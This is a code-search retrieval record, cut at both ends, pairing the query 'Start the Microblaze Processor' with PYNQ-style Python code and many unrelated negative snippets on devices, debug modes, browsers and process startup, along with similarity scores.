\"<\"\n out += str(type(self)).split(\"'\")[1].split(\".\")[-1]\n out += \" \" + str(self.name)\n out += \" id:\" + str(self.id)\n out += \" owner:\" + str(self.owner.id)\n\n if self.tags is not None and len(self.tags):\n out += \" Tags:\"\n for tag in self.tags:\n out += \" \" + str(tag)\n\n if self.is_built:\n out += \" built\"\n\n out += \">\"\n out += \"\\n\"\n _self = self\n\n # out += f\"def {self.name}(\"\n # out += \", \".join(f\"arg_{extract_tag(p)}\" for p in self.find_placeholders(\"input\"))\n # out += \"):\\n\"\n # for action in self.actions:\n # line = \" \"\n # if action.return_ids is not None:\n # if isinstance(action.return_ids, PlaceHolder):\n # tag = extract_tag(action.return_ids)\n # line += f\"_{tag} = \"\n # elif isinstance(action.return_ids, tuple):\n # line += (\n # \", \".join(\n # f\"_{extract_tag(o)}\" if isinstance(o, PlaceHolder) else str(o)\n # for o in action.return_ids\n # )\n # + \" = \"\n # )\n # else:\n # line += str(action.return_ids) + \" = \"\n # if action.target is not None:\n # line += f\"_{extract_tag(self.placeholders[action.target.value])}.\"\n # line += action.name + \"(\"\n # line += \", \".join(\n # f\"_{extract_tag(arg)}\" if isinstance(arg, PlaceHolder) else str(arg)\n # for arg in action.args\n # )\n # if action.kwargs:\n # line += \", \" + \", \".join(f\"{k}={w}\" for k, w in action.kwargs.items())\n # line += \")\\n\"\n # out += line\n\n # out += \" return \"\n # out += \", \".join(f\"_{extract_tag(p)}\" for p in self.find_placeholders(\"output\"))\n\n return out" ]
[ "0.79212874", "0.744362", "0.7122005", "0.707842", "0.70561314", "0.69483036", "0.6882322", "0.6856377", "0.6743266", "0.67065525", "0.66842824", "0.6522843", "0.6477476", "0.64324766", "0.6427607", "0.6427607", "0.6427607", "0.64067274", "0.6403515", "0.63853884", "0.6316158", "0.62879395", "0.6261205", "0.6239784", "0.6209317", "0.6195894", "0.61808604", "0.6140388", "0.6045833", "0.60432404", "0.60354465", "0.6023365", "0.60027", "0.5998394", "0.5991712", "0.5984404", "0.59828097", "0.59801316", "0.5978604", "0.5920368", "0.5909353", "0.5906354", "0.590552", "0.5888428", "0.58855724", "0.58761764", "0.5853196", "0.5848233", "0.58479804", "0.583414", "0.5829132", "0.5821653", "0.5819434", "0.5810961", "0.5796724", "0.5775879", "0.5774709", "0.5764483", "0.5764419", "0.5758241", "0.5739513", "0.5716109", "0.57116747", "0.5684428", "0.5680956", "0.5676957", "0.5672344", "0.5668839", "0.5662765", "0.56601995", "0.5654405", "0.5644582", "0.5635653", "0.5629358", "0.5628961", "0.5613263", "0.5611277", "0.560114", "0.55839133", "0.5564637", "0.55537593", "0.5551078", "0.55465025", "0.554161", "0.5536095", "0.5523544", "0.5521729", "0.55208194", "0.5503907", "0.5503343", "0.5498128", "0.5498128", "0.5486129", "0.5480395", "0.54713064", "0.5468784", "0.5464561", "0.5464322", "0.54498553", "0.5443376", "0.54380846" ]
0.0
-1
Return a new instance of a DevMode object.
def __init__(self, mb_info, switch_config): self.microblaze = Arduino(mb_info, ARDUINO_MAILBOX_PROGRAM) self.iop_switch_config = switch_config
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _new_instance(self):\n return self.__class__(self._vmodule)", "def _new_instance(self):\n return self.__class__(self._fmodule)", "def _new_instance(self):\n return self.__class__(self._fmodule)", "def debug(self):\n return Debug(self)", "def dev_mode(self):\r\n return self._dev_mode", "def new(dxfversion='AC1009'):\n dwg = Drawing.new(dxfversion)\n if dwg.dxfversion > 'AC1009':\n dwg.reset_fingerprintguid()\n dwg.reset_versionguid()\n return dwg", "def DevMode(self):\n for var in DEV_CONFIG:\n self.Cover(var, DEV_CONFIG[var], layer = SETTINGS_LAYER)", "def new(cls):\n return cls()", "def __new__(cls, debug=False):\n if not App.instance:\n App.instance = App.__OnlyApp(debug)\n return App.instance", "def create_instance(c_instance):\n return LemaurPad(c_instance)", "def new_instance(valid, test_mode):\n database = SensorsTable(test_mode=test_mode)\n implementations = SensorGetter.get_sensor_implementations()\n return SensorUpdate(valid, database, implementations, Epidata)", "def __new__(cls, manager, device_config, log_file_name, log_directory):\n # slowly migrate away from using 'hub_port_name' but maintain backwards compatibility\n if \"console_port_name\" not in device_config[\"persistent\"]:\n device_config[\"persistent\"][\"console_port_name\"] = \\\n device_config[\"persistent\"][\"hub_port_name\"]\n\n identifier = device_config[\"persistent\"][\"console_port_name\"]\n if identifier not in cls._instances:\n obj = super(Cambrionix, cls).__new__(cls)\n cls._instances[identifier] = obj\n\n return cls._instances[identifier]", "def create_device():\n sonyapilib.device.TIMEOUT = 0.1\n device = SonyDevice(\"test\", \"test\")\n device.api_version = 3\n device.cookies = jsonpickle.decode(read_file(\"data/cookies.json\"))\n return device", "def clone(self, link_kwargs=None, optimizer=\"\", message=None):\n new_linker = self.linker.clone(**link_kwargs)\n new_optimizer = optimizer\n if optimizer == \"\":\n new_optimizer = self.provided_optimizer\n new_mode = type(self)(linker=new_linker,\n optimizer=new_optimizer)\n # If self is in the list or profiles to print, then add the\n # new one as well\n if self in prof_mode_instance_to_print:\n prof_mode_instance_to_print.append(new_mode)\n\n if message:\n new_mode.message = message\n\n return new_mode", "def develop_mode(self):\n return self._parent.develop_mode", "def set_debug_mode(self):\n self.debug_mode = True", "def new(cls, **kwargs):\n return cls(**kwargs)", "def __new__(cls):\n builder = get_builder('GwitterWindow')\n new_object = builder.get_object(\"gwitter_window\")\n new_object.finish_initializing(builder)\n return new_object", "def start_env(config: OmegaConf, debug_env=False) -> gym.Env:\n if debug_env:\n env = MineRLDebugEnv(config)\n else:\n environment = config.env.name\n env = gym.make(environment)\n env = ActionShaping(env, config)\n env = ObservationWrapper(env, config)\n return env", "def _new_instance(self):\n return self.__class__(self._vmodule, self._tensor_rank)", "def _new_session(self):\n # Create a new session for this model, initialize\n # variables, and save / restore from checkpoint.\n sess_cfg = tf.ConfigProto(allow_soft_placement=True, log_device_placement=False)\n sess_cfg.gpu_options.allow_growth = True\n self._session = tf.Session('', config=sess_cfg)\n self._session.run([self.meval.init])\n\n return self._session", "def debug_mode(self):\n return self._debug_mode", "def __init__(self, device_mode, loop):\n self.loop = loop\n self.device_mode = device_mode\n if self.device_mode == \"stationary\":\n self.openface = OpenFaceInstance()\n self.openface.startProcess()\n self.stationary_eye_tracker = StationaryEyeTracker()\n elif self.device_mode == \"mobile\":\n self.openpose = OpenPoseInstance()\n self.openpose.startProcess()\n self.mobile_eye_tracker = MobileEyeTracker()\n self.mobile_eye_tracker.calibrate()\n\n self.wristband = Wristband(self.loop)", "def mode(self) -> Mode:\n ...", "def __new__(cls):\n game_engine = get_gameengine()\n if game_engine is not None:\n return game_engine\n else:\n return super(GameEngine, cls).__new__(cls)\n # end if", "def __init__(self,\r\n optimizer='fast_run',\r\n stability_patience=None,\r\n check_c_code=None,\r\n check_py_code=None,\r\n check_isfinite=None,\r\n check_preallocated_output=None,\r\n require_matching_strides=None,\r\n linker=None):\r\n\r\n if linker is not None and not issubclass(linker, _Linker):\r\n raise Exception(\"DebugMode can only use its own linker! You \"\r\n \"should not provide one.\", linker)\r\n\r\n super(DebugMode, self).__init__(\r\n optimizer=optimizer,\r\n linker=_Linker)\r\n\r\n if stability_patience is not None:\r\n self.stability_patience = stability_patience\r\n\r\n if check_c_code is not None:\r\n self.check_c_code = check_c_code\r\n\r\n if check_py_code is not None:\r\n self.check_py_code = check_py_code\r\n\r\n if check_isfinite is not None:\r\n self.check_isfinite = check_isfinite\r\n\r\n if check_preallocated_output is not None:\r\n # Copy to avoid sharing the same list across different instances\r\n self.check_preallocated_output = check_preallocated_output[:]\r\n\r\n if require_matching_strides is not None:\r\n self.require_matching_strides = require_matching_strides\r\n\r\n if not (self.check_c_code or self.check_py_code):\r\n raise ValueError('DebugMode has to check at least one of c and py '\r\n 'code')", "def new_session(self):\n self._session = self.vspk.NUVSDSession(\n username=self.user,\n password=self.password,\n enterprise=self.enterprise,\n api_url=self.uri)\n\n self._session.start()\n if not self.default_enterprise:\n self.default_enterprise = self.get_enterprise_by_name(\n self.default_netpartition_name)\n\n self.assertIsNotNone(self.default_enterprise,\n \"Should have a default \"\n \"enterprise for Nuage plugin\")\n\n return self._session", "def __init__(self, dev):\n self.dev = dev\n self.dev.cla = 0x80", "def _new_instance(self):\n return self.__class__(self._fmodule, self._tensor_rank)", "def gpu(device_id=0):\n return Context('gpu', device_id)", "def gpu(device_id=0):\n return Context('gpu', device_id)", "def parserFactory(intLanguageName, debugMode):\r\n #if text.getDebug() != debugMode:\r\n # text.setDebugRecurs(debugMode)\r\n\r\n return THE_PARSER", "def development_mode(self):\n self.monitor_leaks = True", "def New():\n Self = $classname()\n Self._initialize_()\n Self._update_()\n return Self", "def create(cls):\n pass\n return cls()", "def createBrowser(self, mode=False):\n\t\tbr = mechanize.Browser(factory = mechanize.RobustFactory())\n\t\tbr.set_handle_equiv(True)\n\t\tbr.set_handle_redirect(True)\n\t\tbr.set_handle_referer(True)\n\t\tbr.set_handle_robots(False)\n\t\tbr.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)\n\t\tbr.set_debug_http(mode)\n\t\tbr.set_debug_responses(mode)\n\t\tbr.set_debug_redirects(mode)\n\t\tbr.addheaders = [(\"User-Agent\", \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) C hrome/16.0.912.63 Safari/535.7\")]\n\t\tcj = cookielib.LWPCookieJar()\n\t\tbr.set_cookiejar(cj)\n\t\treturn br", "def make_env(\n\t\tdomain_name,\n\t\ttask_name,\n\t\tseed=0,\n\t\tepisode_length=1000,\n\t\tframe_stack=3,\n\t\taction_repeat=4,\n\t\timage_size=100,\n\t\tmode='original'\n\t):\n\tassert mode in {'original', 'color_easy', 'color_hard', 'video_easy', 'video_hard'}, \\\n\t\tf'specified mode \"{mode}\" is not supported'\n\n\tenv = dmc2gym.make(\n\t\tdomain_name=domain_name,\n\t\ttask_name=task_name,\n\t\tseed=seed,\n\t\tvisualize_reward=False,\n\t\tfrom_pixels=True,\n\t\theight=image_size,\n\t\twidth=image_size,\n\t\tepisode_length=episode_length,\n\t\tframe_skip=action_repeat\n\t)\n\tenv = VideoWrapper(env, mode, seed)\n\tenv = FrameStack(env, frame_stack)\n\tenv = RandomizationWrapper(env, mode, seed)\n\n\treturn env", "def create_mode(self, mode_slug, mode_name, min_price=0, suggested_prices='', currency='usd'):\r\n return CourseMode.objects.get_or_create(\r\n course_id=self.course_key,\r\n mode_display_name=mode_name,\r\n mode_slug=mode_slug,\r\n min_price=min_price,\r\n suggested_prices=suggested_prices,\r\n currency=currency,\r\n )", "def doc_dev_factory(global_config, **local_conf):\n\treturn make_app(blueprints.developer_portal, settings.DevelopmentConfig)", "def createCamera():\n prefs = getPreferences()\n\n # Remove any pre-existing preview camera.\n if CAM_NAME in bpy.data.cameras:\n bpy.data.cameras.remove(bpy.data.cameras[CAM_NAME], do_unlink=True)\n\n # Store the current scene camera.\n cache.values[\"sceneCamera\"] = bpy.context.scene.camera\n\n # Create a new camera and name it accordingly.\n bpy.ops.object.camera_add()\n cam = bpy.context.object\n cam.name = CAM_NAME\n cam.data.name = CAM_NAME\n cache.values[\"camera\"] = cam\n\n # Set the camera properties.\n cam.location = Vector((10, -10, 10))\n rot = prefs.camAngle_value\n cam.rotation_euler = Euler((math.radians(rot[0]),\n math.radians(rot[1]),\n math.radians(rot[2])))\n cam.data.clip_start = prefs.clipStart_value\n cam.data.clip_end = prefs.clipEnd_value\n cam.data.lens = prefs.focal_value\n\n view3d = get3dView()\n # Store the current view camera, if any.\n cache.values[\"viewCamera\"] = view3d.camera if view3d.camera else None\n # Set the render camera for the view.\n view3d.camera = cam", "def __init__(self, experiences=None, mode=None, shape=None, pixel_width=None, pixel_height=None, dpi=None, current_pixel_width=None, current_pixel_height=None, touch=None, keyboard=None, video=None):\n # type: (Optional[List[Experience_99e18a0a]], Optional[Mode_968d4aaa], Optional[Shape_d8a6bf70], Optional[float], Optional[float], Optional[float], Optional[float], Optional[float], Optional[List[Touch_93b302c]], Optional[List[Keyboard_6e759daa]], Optional[ViewportStateVideo_a9fffd46]) -> None\n self.__discriminator_value = None # type: str\n\n self.experiences = experiences\n self.mode = mode\n self.shape = shape\n self.pixel_width = pixel_width\n self.pixel_height = pixel_height\n self.dpi = dpi\n self.current_pixel_width = current_pixel_width\n self.current_pixel_height = current_pixel_height\n self.touch = touch\n self.keyboard = keyboard\n self.video = video", "def dev():\n trio.run(_dev_main)", "def clone(self):\n st = Connect4Env(width=self.width, height=self.height)\n st.current_player = self.current_player\n st.winner = self.winner\n st.board = np.array([self.board[col][:] for col in range(self.width)])\n return st", "def make_env():\n aigym_path = \"video/\"\n env = retro.make(game='MortalKombatII-Genesis',state='Level1.LiuKangVsJax')\n env = wrappers.Monitor(env, aigym_path,video_callable=False ,force=True) #, video_callable=False \n env = ObservationWraperMK(env)\n env = PlayerOneNetworkControllerWrapper(env)\n env._max_episode_steps = 350\n #env.render()\n\n return env", "def make(self):\n return _spacegrant_swig.udp_debug_sptr_make(self)", "def new(self):\n self._init()", "def _config_session(self):\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.gpu_options.visible_device_list = str(self.device_num)\n return tf.Session(config=config)", "def debug(mode=True):\r\n global DEBUG\r\n DEBUG = bool(mode)", "def create_instance(self, **kwargs):\r\n create_options = self._generate_create_dict(**kwargs)\r\n return self.guest.createObject(create_options)", "def create_instance(c_instance):\n return OpenLabs(c_instance)", "def create_instance(c_instance):\n return VCM600(c_instance)", "def create_instance(c_instance):\n return VCM600(c_instance)", "def __init__(self, device):\n self._unique_id = device\n self._device = AehW4a1(device)\n self._fan_modes = FAN_MODES\n self._swing_modes = SWING_MODES\n self._preset_modes = PRESET_MODES\n self._attr_available = False\n self._on = None\n self._current_temperature = None\n self._target_temperature = None\n self._attr_hvac_mode = None\n self._fan_mode = None\n self._swing_mode = None\n self._preset_mode = None\n self._previous_state = None", "def get_or_create_context(self, devnum):\n if devnum is None:\n attached_ctx = self._get_attached_context()\n if attached_ctx is None:\n return self._get_or_create_context_uncached(devnum)\n else:\n return attached_ctx\n else:\n if USE_NV_BINDING:\n devnum = int(devnum)\n return self._activate_context_for(devnum)", "def make(self, *args, **kwargs):\r\n self.make_module_instance(args,kwargs)\r\n\r\n mode = kwargs.pop('mode', theano.compile.mode.get_default_mode())\r\n rval = self.make_no_init(mode)\r\n if hasattr(rval, 'initialize'):\r\n rval.initialize(*args, **kwargs)\r\n return rval", "def create_browser_instance():\n cmd = [browser_sync_path, 'start', '--proxy=localhost:8000']\n check_output(cmd)", "def develope_mode(self, _):\n global develope_mode\n develope_mode = not develope_mode", "def is_dev(self):\n\n return self.dev", "def create_device(cls, dev):\n obj = super().__new__(cls)\n if isinstance(dev, Device):\n obj.sycl_queue_ = dev.sycl_queue\n elif isinstance(dev, dpctl.SyclQueue):\n obj.sycl_queue_ = dev\n elif isinstance(dev, dpctl.SyclDevice):\n par = dev.parent_device\n if par is None:\n obj.sycl_queue_ = dpctl.SyclQueue(dev)\n else:\n raise ValueError(\n \"Using non-root device {} to specify offloading \"\n \"target is ambiguous. Please use dpctl.SyclQueue \"\n \"targeting this device\".format(dev)\n )\n else:\n if dev is None:\n obj.sycl_queue_ = dpctl.SyclQueue()\n else:\n obj.sycl_queue_ = dpctl.SyclQueue(dev)\n return obj", "def create_boot_dev(self):\n\t\treturn handle_to_object(call_sdk_function('PrlVmCfg_CreateBootDev', self.handle))", "def GetDebugMode(self):\n return bool(self.debug_mode)", "def new_browser():\n\n\tbrowser = mechanize.Browser()\n\tbrowser.set_handle_robots(False)\n\tbrowser.set_handle_refresh(False)\n\n\treturn browser", "def open(self):\n if dev[self.id] != FLI_INVALID_DEVICE:\n raise FliError(\"Device already opened\")\n dev[self.id] = FLIDEVICE_CAMERA\n\n # set default parameters\n self.setTemperature(CCD_TEMP)\n self.setHBin(1)\n self.setVBin(1)\n self.setExpTime(0)\n self.setFrame(0, 0, 1072, 1033)\n with self.lock:\n self.status = READY\n self.visibleExpArea = (24, 9, 1048, 1033)\n self.defaultExpArea = (0, 0, 1072, 1033)\n self.expArea = (0, 0, 1072, 1033)\n self.regions = ((0, 0, 0), (0, 0, 0))", "def create(window_type=WindowType.DEFAULT, rate=10):\n return BasicController(Visualiser(window_type=window_type))", "def SetDebugMode(enabled=True):\n global option\n option['debug_mode'] = enabled", "def showUI(cls):\r\n win = cls()\r\n win.create()\r\n return win", "def debug_mode(self, debug_mode):\n\n self._debug_mode = debug_mode", "def set_debug_mode(self, value):\n self.debug = value", "def is_development_mode(registry):\n if 'mode' in registry.settings:\n return registry.settings['mode'].lower() == 'development'\n return False", "def create_vm_dev(self, nDeviceType):\n\t\treturn handle_to_object(call_sdk_function('PrlVmCfg_CreateVmDev', self.handle, nDeviceType))", "def PRODUCTION(cls):\n\n return DataCenter.Environment(\"https://www.zohoapis.eu\", cls().get_iam_url(), cls().get_file_upload_url())", "def startMode(self):\n raise NotImplementedError('startMode() should be implemented')", "def new_session(self):\n return self.Session()", "def init_display(size=(640, 480), flags = 0):\n warn(\"\"\"\n In an ongoing attempt at cleaning up rabbyt, init_display has been\n deprecated and will be removed in a future version. You can achive the\n same result by doing this::\n\n pygame.init()\n pygame.display.set_mode(size, pygame.OPENGL | pygame.DOUBLEBUF)\n rabbyt.set_viewport(size)\n rabbyt.set_default_attribs()\n \"\"\", stacklevel=2)\n pygame = __import__(\"pygame\", {},{},[])\n pygame.init()\n surface = pygame.display.set_mode(size, pygame.OPENGL |\n pygame.DOUBLEBUF | flags)\n set_viewport(size)\n set_default_attribs()\n return surface", "def create_headless_browser(self) -> webdriver.firefox.webdriver.WebDriver:\n try:\n ff_opts = webdriver.FirefoxOptions()\n ff_opts.headless = True\n browser = webdriver.Firefox(options=ff_opts)\n except Exception as err:\n print(\"Unable to initialize headless FireFox session with Selenium.\")\n print(err)\n \n return browser", "def _create_device(self):\n project_page = 'https://garage.maemo.org/projects/brisa'\n self.device = Device('urn:schemas-upnp-org:device:BinaryLight:1',\n self.server_name,\n manufacturer='Brisa Team. Embedded Laboratory '\\\n 'and INdT Brazil',\n manufacturer_url=project_page,\n model_name='Binary Light Device',\n model_description='A UPnP Binary Light Device',\n model_number='1.0',\n model_url=project_page)", "def api_dev_factory(global_config, **local_conf):\n\treturn make_app(blueprints.api_server, settings.DevelopmentConfig)", "def start_virtual_display(self, width=1440, height=900,\n colordepth=24, **kwargs):\n if self._display is None:\n logger.info(\"Using virtual display: '{0}x{1}x{2}'\".format(\n width, height, colordepth))\n\n self._display = Xvfb(int(width), int(height),\n int(colordepth), **kwargs)\n self._display.start()\n atexit.register(self._display.stop)", "def getInstance():\n # TKC - Removed singleton since component and command instances were clashing.\n # if(GenFactory.__instance is None) :\n # GenFactory.__instance = GenFactory()\n #\n # return GenFactory.__instance\n return GenFactory()", "def new(self, **kwargs):\n return self.__model__(**self._preprocess_params(kwargs))", "def get_builder_instance(self):\n if self.framework == 'standalone':\n builder_instance = BuildStandaloneExecutionScenario(\n scenario=self.scenario,\n testcase_list=self.testcase_list,\n splunk_metadata=self.splunk_metadata\n )\n else:\n builder_instance = BuildOneMapExecutionScenario(\n scenario=self.scenario,\n testcase_list=self.testcase_list,\n splunk_metadata=self.splunk_metadata\n )\n return builder_instance", "def make(self, *args, **kwargs):\r\n mode = kwargs.pop('mode', theano.compile.mode.get_default_mode())\r\n rval = self.make_no_init(mode)\r\n if hasattr(rval, 'initialize'):\r\n rval.initialize(*args, **kwargs)\r\n return rval", "def create_instance(c_instance):\n return MonoPedal(c_instance)", "def new(self):\n self.__buttons.setDisabled(False)\n self.__service = None\n self.name.setFocus()\n self.name.setText(\"\")\n self.threadable.setChecked(False)\n self.min_cores.setValue(100)\n self.max_cores.setValue(100)\n self.min_memory.setValue(3276)\n self.min_gpu_memory.setValue(self.gpu_min_mb)\n self.timeout.setValue(0)\n self.timeout_llu.setValue(0)\n self.min_memory_increase.setValue(2048)\n self._tags_w.set_tags(['general'])", "def __new__(cls, ctx):\n return cls.__run(cls, ctx)", "def indev_class(cls, message: str, warning_type):\n cls.__doc__ = indev_doc(cls.__doc__, message)\n\n if cls.__new__ is object.__new__:\n cls.__init__ = indev_function(\n _get_function(cls.__init__),\n message=message,\n warning_type=warning_type,\n )\n else:\n cls.__new__ = indev_function(\n _get_function(cls.__new__),\n message=message,\n warning_type=warning_type,\n )\n\n return cls", "def New(derived_class):\n dc = derived_class()\n dc.initialize_implementation()\n return dc", "def makeDrawer(self,node):\n drawer = MeshDrawer2D()\n drawer.setBudget(3000)\n\n drawerNode = drawer.getRoot()\n drawerNode.reparentTo(node)\n drawerNode.setDepthWrite(False)\n drawerNode.setTransparency(True)\n drawerNode.setTwoSided(True)\n drawerNode.setBin(\"fixed\",0)\n drawerNode.setLightOff(True)\n drawerNode.node().setBounds(OmniBoundingVolume())\n drawerNode.node().setFinal(True) \n \n # debug wire frame\n #cc = drawerNode.copyTo(node)\n #cc.setRenderModeWireframe()\n\n return drawer", "def __new__(cls, *args, **kwargs):\n if not cls._instance:\n cls._instance = super(Config, cls).__new__(cls)\n return cls._instance", "def _set_debug_mode(self, value):\n self.debug_mode = value\n self.l_info(\"_set_debug_mode\",\"%d\" % (self.debug_mode))\n self.set_driver('GV4', self.debug_mode, uom=25, report=True)\n self.logger.setLevel(self.debug_mode)\n return True", "def __init__(self, api, coordinator, name, dev_id, model):\n super().__init__(api, coordinator, name, dev_id)\n\n self._model = model\n\n self._is_on = False\n\n self._unique_id = f\"{dev_id}-plug\"", "def create(\n cls,\n window, name, *,\n force_writes=False,\n follow_cursor=False,\n unlisted=False,\n **kwargs\n ):\n validate_view_options(kwargs)\n\n window.destroy_output_panel(name)\n view = window.create_output_panel(name, unlisted)\n set_view_options(view, **kwargs)\n\n return cls(window, name, force_writes=force_writes, follow_cursor=follow_cursor)", "def new_room(self):\r\n return Room()", "def create_instance(c_instance):\n return AumPC40(c_instance)", "def inst(cls):\n if cls.instance is None:\n raise OptionsError(\"No options have been set\")\n return cls.instance", "def open(cls, name, gxapi_vox=None, dtype=None, mode=MODE_READ, depth=False):\n\n if gxapi_vox is None:\n gxapi_vox = gxapi.GXVOX.create(_vox_file_name(name))\n vox = cls(name, gxapi_vox, dtype=dtype, mode=mode)\n\n vox.is_depth = depth\n\n return vox", "def instantiateNewCmd(self):\n return QadSTRETCHCommandClass(self.plugIn)", "def create_camera():\n camera = PiCamera()\n camera.hflip = True\n camera.vflip = True\n camera.resolution = tuple(camera_settings['resolution'])\n camera.framerate = camera_settings['fps']\n return camera", "def create_gpu_device():\n d1 = dpctl.SyclDevice(\"gpu\")\n d2 = dpctl.select_gpu_device()\n assert d1 == d2\n print_device(d1)\n return d1", "def development_function(self): \n return None", "def program( self, mode ):\n renderer = mode.cache.getData( self )\n if renderer is None:\n renderer = self.compile( mode )\n return renderer" ]
[ "0.5734324", "0.55724305", "0.55724305", "0.5561178", "0.55437505", "0.55043155", "0.5407992", "0.53603274", "0.5352191", "0.53068537", "0.5200111", "0.5169847", "0.51558495", "0.51315564", "0.51260436", "0.5092145", "0.5049877", "0.5045362", "0.500854", "0.49994266", "0.49444494", "0.49435768", "0.4925886", "0.49178022", "0.4917745", "0.49145707", "0.49081364", "0.49051312", "0.48858374", "0.48664016", "0.48664016", "0.48501012", "0.48344013", "0.4829021", "0.4826624", "0.4822309", "0.4815776", "0.4815297", "0.48006752", "0.47928122", "0.47864148", "0.4780967", "0.47797477", "0.47545666", "0.4752097", "0.47470346", "0.47467592", "0.47337326", "0.47259137", "0.4716329", "0.47162554", "0.47162554", "0.47145566", "0.47059497", "0.46990258", "0.46941355", "0.46785253", "0.4662854", "0.46628127", "0.46591058", "0.46473068", "0.4645969", "0.4645341", "0.46303642", "0.4626543", "0.46220952", "0.46211243", "0.4612522", "0.4611813", "0.46102652", "0.46033788", "0.45876977", "0.45828003", "0.45791033", "0.4573825", "0.4566799", "0.45662266", "0.45604637", "0.4555562", "0.4552675", "0.45491856", "0.45467395", "0.4545077", "0.4544945", "0.45425183", "0.4535086", "0.45261917", "0.45252597", "0.4520397", "0.45164576", "0.45093152", "0.45091543", "0.45070767", "0.45025674", "0.4501141", "0.450016", "0.44996545", "0.44985366", "0.44890076", "0.44888896", "0.448576" ]
0.0
-1
Start the Microblaze Processor. The processor instance will start automatically after instantiation.
def start(self): self.microblaze.run() self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, 0) self.load_switch_config(self.iop_switch_config)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def startup(self):\n if self.initialize_mp:\n self.initialize_multiprocessing()\n self.startup_run()\n self.startup_finish()", "def start(params) -> None:\n check_root()\n start_microservice(params)\n load_kernel_module(params)\n start_streamer(params)", "def platform_start(self):\n self.platform.start()", "def start(self):\n control_process = mp.Process(target = self._start, args = [])\n control_process.start()", "async def start(self):\n await self._backend.start()", "def Start(self):\n\n\n\n assert not self._process, 'Start() can only be called once'\n self._process = subprocess.Popen(self._args)", "def run(self) -> None:\n self.microphone.start()\n try:\n self._run()\n finally:\n self.microphone.stop()", "def start(self) -> None:\n context = self._get_multiprocessing_context()\n self._last_parsing_stat_received_at = time.monotonic()\n\n self._parent_signal_conn, child_signal_conn = context.Pipe()\n process = context.Process(\n target=type(self)._run_processor_manager,\n args=(\n self._dag_directory,\n self._max_runs,\n self._processor_timeout,\n child_signal_conn,\n self._dag_ids,\n self._pickle_dags,\n self._async_mode,\n ),\n )\n self._process = process\n\n process.start()\n\n self.log.info(\"Launched DagFileProcessorManager with pid: %s\", process.pid)", "def initialize_multiprocessing(self):\n if self.multiprocessing_controller is not None:\n MPControl.set_multiprocess_engine(self.multiprocessing_controller)\n MPControl.connect()", "def start(self):\n\n address = (socket.gethostbyname(self.hostname), self.port)\n logger.info(\"Connecting to %r\" % (address,))\n self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._socket.connect(address)\n self._start_processors()\n return self", "def start(self):\n self.j_pump.start()\n return self", "def start(self):\n \n rpc = self.smartstarter.rpcsystem\n \n process = yield self.smartstarter.start()\n \n try:\n \n make_worker_url = yield process.get_function_url(make_worker)\n make_worker_stub = rpc.create_function_stub(make_worker_url)\n \n worker = yield make_worker_stub(\"local\") # TODO remove network\n \n worker.get_function_url = process.get_function_url_stub\n \n worker.reset = rpc.create_local_function_stub(process.reset)\n worker.stop = rpc.create_local_function_stub(process.stop)\n worker.kill = rpc.create_local_function_stub(process.kill)\n worker.stdout = process.stdout.make_stub(rpc)\n worker.stderr = process.stderr.make_stub(rpc)\n worker.exited = process.exited.make_stub(rpc)\n\n except:\n process.kill()\n raise \n \n\n \n # worker.stdout.add_callback(stdout)\n # worker.stderr.add_callback(stderr)\n \n# receiver_stub = rpc.create_local_function_stub(hook.receiver)\n# hookinstall_url = yield process.get_function_url(hook.install_hook)\n# hookinstall_url_stub = rpc.create_function_stub(hookinstall_url)\n# yield hookinstall_url_stub(receiver_stub)\n \n defer.returnValue(worker)", "def start(self):\n self.p.start()", "def start(self):\n logger.debug('Starting controller')\n pass", "def start(self) -> None:\n JavaGate().exec_process_instance(\n self._user,\n self._project,\n self.name,\n \"\",\n self.worker_group,\n self.warning_type,\n self.warning_group_id,\n 24 * 3600,\n )", "def start(self):\n if self._start_event is None:\n _call_spawn_callbacks(self)\n hub = get_my_hub(self) # pylint:disable=undefined-variable\n self._start_event = hub.loop.run_callback(self.switch)", "def start(self):\n if self._started:\n return\n\n self._register()\n self._started = True", "def add_cpu(self):\n cpu_worker = CPUCmdRunner(self.host, 'cpu')\n self.cpu_workers.append(cpu_worker)\n cpu_worker.start()\n self.log.info('CPU worker added')", "def start_processing(self):", "def start(self):\n for workload in self._workloads:\n self.log.info(\"%-20s STARTING port=%s\" % (workload.name(), workload.port()))\n workload.pre_start()\n workload.start()\n self._monitor_loop()\n self._cleanup()", "def _start(self):\n\n _log.debug(\"Pipeline {} launching run components\".format(self.id))\n self._start_time = time.time()\n for run in self.runs:\n run.start()\n if run.sleep_after:\n time.sleep(run.sleep_after)", "def do_start(self,processor):\n # app_logger = self.construct_logger(rta_constants.PROPERTIES_LOG_FILE)\n running_dict = {}\n for item in self.get_running_status():\n running_dict[item.get('processor')]=item.get('status')\n\n if processor == 'spark':\n if running_dict:\n if running_dict['spark<spark_worker>'] != 'Running' and running_dict['spark<spark_master>'] != 'Running':\n try:\n cmd_line = self.cmd_start_spark\n cmd = subprocess.Popen([cmd_line],shell=True,stdout=subprocess.PIPE)\n (output,err) = cmd.communicate()\n # app_logger.info('*********output logging **************')\n print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if running_dict['spark<spark_worker>'] == 'Running' or running_dict['spark<spark_master>'] == 'Running':\n print('Spark Server is running!! please trying to stop it before it starts.')\n return\n else:\n print('Please type correct command! You may use \"help start\" see more help')\n return\n\n elif processor == 'tomcat':\n if running_dict.has_key('tomcat') and running_dict['tomcat'] != 'Running':\n try:\n cmd_line = self.cmd_start_tomcat\n # print('staring tomcat server------->')\n print cmd_line\n\n # 2311 Vpl update to fix problem of catalina shutdown when term exit (10.x timeout)\n cmd = subprocess.call(['nohup',cmd_line,'start'])\n #cmd = subprocess.Popen([cmd_line],shell=True,stderr=subprocess.PIPE)\n #(output,err) = cmd.communicate()\n\n # app_logger.info('*********output logging **************')\n #print(output)\n return\n except Exception as ex:\n print(\" Failed to run processor with ERROR(%s).\", str(ex))\n sys.exit(1)\n else:\n if not running_dict.has_key('tomcat'):\n print('Please type correct command! You may use \"help start\" see more help')\n return\n 